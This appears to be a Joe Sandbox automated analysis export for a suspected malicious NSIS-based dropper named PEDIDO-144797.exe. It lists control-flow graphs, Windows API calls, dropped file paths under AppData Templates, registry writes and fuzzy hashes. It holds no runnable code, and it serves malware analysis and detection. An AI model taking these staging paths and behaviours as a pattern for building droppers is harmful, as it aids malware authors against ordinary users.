control_flow_graph 139 403abe-403ad6 call 40678a 142 403ad8-403ae8 call 4062f7 139->142 143 403aea-403b21 call 40627e 139->143 151 403b44-403b6d call 403d94 call 405d89 142->151 147 403b23-403b34 call 40627e 143->147 148 403b39-403b3f lstrcatW 143->148 147->148 148->151 157 403b73-403b78 151->157 158 403bff-403c07 call 405d89 151->158 157->158 159 403b7e-403ba6 call 40627e 157->159 163 403c15-403c3a LoadImageW 158->163 164 403c09-403c10 call 4063d2 158->164 159->158 169 403ba8-403bac 159->169 167 403cbb-403cc3 call 40140b 163->167 168 403c3c-403c6c RegisterClassW 163->168 164->163 182 403cc5-403cc8 167->182 183 403ccd-403cd8 call 403d94 167->183 172 403c72-403cb6 SystemParametersInfoW CreateWindowExW 168->172 173 403d8a 168->173 170 403bbe-403bca lstrlenW 169->170 171 403bae-403bbb call 405cae 169->171 177 403bf2-403bfa call 405c81 call 4063b0 170->177 178 403bcc-403bda lstrcmpiW 170->178 171->170 172->167 176 403d8c-403d93 173->176 177->158 178->177 181 403bdc-403be6 GetFileAttributesW 178->181 185 403be8-403bea 181->185 186 403bec-403bed call 405ccd 181->186 182->176 192 403d61-403d69 call 4054e7 183->192 193 403cde-403cf8 ShowWindow call 40671a 183->193 185->177 185->186 186->177 198 403d83-403d85 call 40140b 192->198 199 403d6b-403d71 192->199 200 403d04-403d16 GetClassInfoW 193->200 201 403cfa-403cff call 40671a 193->201 198->173 199->182 206 403d77-403d7e call 40140b 199->206 204 403d18-403d28 GetClassInfoW RegisterClassW 200->204 205 403d2e-403d5f DialogBoxParamW call 40140b call 403a0e 200->205 201->200 204->205 205->176 206->182
APIs
  • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
  • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
• lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,77763420,"C:\Users\user\Desktop\PEDIDO-144797.exe",00000000), ref: 00403B3F
• lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
• lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
• GetFileAttributesW.KERNEL32(Call), ref: 00403BDD
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet), ref: 00403C26
  • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
• RegisterClassW.USER32(004291E0), ref: 00403C63
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
• ShowWindow.USER32(00000005,00000000), ref: 00403CE6
• GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
• GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
• RegisterClassW.USER32(004291E0), ref: 00403D28
• DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-2905262321
• Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
• Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
• Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
• Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D

Control-flow Graph
control_flow_graph 213 402f14-402f62 GetTickCount GetModuleFileNameW call 405ea2 216 402f64-402f69 213->216 217 402f6e-402f9c call 4063b0 call 405ccd call 4063b0 GetFileSize 213->217 218 4031b3-4031b7 216->218 225 402fa2-402fb9 217->225 226 40308c-40309a call 402e72 217->226 228 402fbb 225->228 229 402fbd-402fca call 40342b 225->229 233 4030a0-4030a3 226->233 234 40316b-403170 226->234 228->229 235 402fd0-402fd6 229->235 236 403127-40312f call 402e72 229->236 237 4030a5-4030bd call 403441 call 40342b 233->237 238 4030cf-40311b GlobalAlloc call 4068eb call 405ed1 CreateFileW 233->238 234->218 239 403056-40305a 235->239 240 402fd8-402ff0 call 405e5d 235->240 236->234 237->234 261 4030c3-4030c9 237->261 264 403131-403161 call 403441 call 4031ba 238->264 265 40311d-403122 238->265 244 403063-403069 239->244 245 40305c-403062 call 402e72 239->245 240->244 259 402ff2-402ff9 240->259 251 40306b-403079 call 40687d 244->251 252 40307c-403086 244->252 245->244 251->252 252->225 252->226 259->244 263 402ffb-403002 259->263 261->234 261->238 263->244 266 403004-40300b 263->266 273 403166-403169 264->273 265->218 266->244 268 40300d-403014 266->268 268->244 270 403016-403036 268->270 270->234 272 40303c-403040 270->272 275 403042-403046 272->275 276 403048-403050 272->276 273->234 274 403172-403183 273->274 277 403185 274->277 278 40318b-403190 274->278 275->226 275->276 276->244 279 403052-403054 276->279 277->278 280 403191-403197 278->280 279->244 280->280 281 403199-4031b1 call 405e5d 280->281 281->218
APIs
• GetTickCount.KERNEL32 ref: 00402F28
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PEDIDO-144797.exe,00000400), ref: 00402F44
  • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00405EA6
  • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
• GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144797.exe,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00402F8D
• GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PEDIDO-144797.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 2803837635-2771451183
• Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
• Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
• Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
• Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD

Control-flow Graph
control_flow_graph 548 4063d2-4063dd 549 4063f0-406406 548->549 550 4063df-4063ee 548->550 551 40640c-406419 549->551 552 40661e-406624 549->552 550->549 551->552 555 40641f-406426 551->555 553 40662a-406635 552->553 554 40642b-406438 552->554 557 406640-406641 553->557 558 406637-40663b call 4063b0 553->558 554->553 556 40643e-40644a 554->556 555->552 559 406450-40648e 556->559 560 40660b 556->560 558->557 562 406494-40649f 559->562 563 4065ae-4065b2 559->563 564 406619-40661c 560->564 565 40660d-406617 560->565 566 4064a1-4064a6 562->566 567 4064b8 562->567 568 4065b4-4065ba 563->568 569 4065e5-4065e9 563->569 564->552 565->552 566->567 572 4064a8-4064ab 566->572 575 4064bf-4064c6 567->575 573 4065ca-4065d6 call 4063b0 568->573 574 4065bc-4065c8 call 4062f7 568->574 570 4065f8-406609 lstrlenW 569->570 571 4065eb-4065f3 call 4063d2 569->571 570->552 571->570 572->567 577 4064ad-4064b0 572->577 586 4065db-4065e1 573->586 574->586 579 4064c8-4064ca 575->579 580 4064cb-4064cd 575->580 577->567 582 4064b2-4064b6 577->582 579->580 584 406508-40650b 580->584 585 4064cf-4064f6 call 40627e 580->585 582->575 587 40651b-40651e 584->587 588 40650d-406519 GetSystemDirectoryW 584->588 599 406596-406599 585->599 600 4064fc-406503 call 4063d2 585->600 586->570 590 4065e3 586->590 592 406520-40652e GetWindowsDirectoryW 587->592 593 406589-40658b 587->593 591 40658d-406591 588->591 595 4065a6-4065ac call 406644 590->595 591->595 596 406593 591->596 592->593 593->591 598 406530-40653a 593->598 595->570 596->599 604 406554-40656a SHGetSpecialFolderLocation 598->604 605 40653c-40653f 598->605 599->595 602 40659b-4065a1 lstrcatW 599->602 600->591 602->595 608 406585 604->608 609 40656c-406583 SHGetPathFromIDListW CoTaskMemFree 604->609 605->604 607 406541-406548 605->607 610 406550-406552 607->610 608->593 609->591 609->608 610->591 610->604
                                                                                                                                          APIs
                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406513
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406526
                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406562
                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406570
                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040657B
                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,00422708,?,0040544B,00422708,00000000), ref: 004065F9
                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                          • API String ID: 717251189-1230650788
                                                                                                                                          • Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                                                                          • Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
                                                                                                                                          • Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                                                                          • Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D

Control-flow Graph: function starting at 40176f (rendered graph not available in this text export)
                                                                                                                                          APIs
                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi,?,?,00000031), ref: 004017B0
                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi,?,?,00000031), ref: 004017D5
                                                                                                                                            • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                          Strings
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp$C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi$Call
                                                                                                                                          • API String ID: 1941528284-2260999969
                                                                                                                                          • Opcode ID: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                                                                                          • Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
                                                                                                                                          • Opcode Fuzzy Hash: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                                                                                          • Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE

Control-flow Graph: function starting at 402644 (rendered graph not available in this text export)
                                                                                                                                          APIs
                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                                                                            • Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405F99
                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                                                                                          Strings
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                          • String ID: 9
                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                          • Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                                                                          • Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
                                                                                                                                          • Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                                                                          • Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

Control-flow Graph: function starting at 40671a (rendered graph not available in this text export)
                                                                                                                                          APIs
                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                                                          • wsprintfW.USER32 ref: 0040676C
                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                          • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                          • Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
                                                                                                                                          • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                          • Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798

Control-flow Graph: function starting at 4058e3 (rendered graph not available in this text export)
                                                                                                                                          APIs
                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                                                                                          • GetLastError.KERNEL32 ref: 0040593A
                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
                                                                                                                                          • GetLastError.KERNEL32 ref: 00405959
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                          • API String ID: 3449924974-3370423016
                                                                                                                                          • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                                          • Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
                                                                                                                                          • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                                          • Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9

Control-flow Graph
• Basic blocks 405ed1-405f23; block 405ede-405f12 calls GetTickCount and GetTempFileNameW, and block 405f14-405f16 has a back edge to it (the call is repeated until it succeeds)
APIs
• GetTickCount.KERNEL32 ref: 00405EEF
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77763420,004036D5), ref: 00405F0A
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-639685201
• Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
• Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
• Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
• Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69

Control-flow Graph
• Basic blocks 10001759-100018a8; calls subfunctions 10001b18, 10002286, 100022d0, 100024a4, 100015b4, 10001272, 10002b57, 1000289c, 10002640, 10002467 and 1000153d; API calls GlobalFree (blocks 100017ee-1000180a and 1000189f-100018a0) and FreeLibrary (block 1000187a-1000187b)
APIs
  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
• GlobalFree.KERNEL32(00000000), ref: 10001804
• FreeLibrary.KERNEL32(?), ref: 1000187B
• GlobalFree.KERNEL32(00000000), ref: 100018A0
  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
  • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
Memory Dump Source
• Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
Similarity
• API ID: Global$Free$Alloc$Librarylstrcpy
• String ID:
• API String ID: 1791698881-3916222277
• Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
• Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
• Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
• Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

Control-flow Graph
• Basic blocks 4023de-402557, exiting through 402885-40288c and 402abf-402ace; calls subfunctions 402c37 (twice), 402cc7, 402c15 and 4031ba; API calls lstrlenW (block 402421-40242e), RegSetValueExW (block 40245d-402471) and RegCloseKey (block 402476-402557)
APIs
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,00000023,00000011,00000002), ref: 00402429
• RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,00000000,00000011,00000002), ref: 00402469
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,00000000,00000011,00000002), ref: 00402551
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
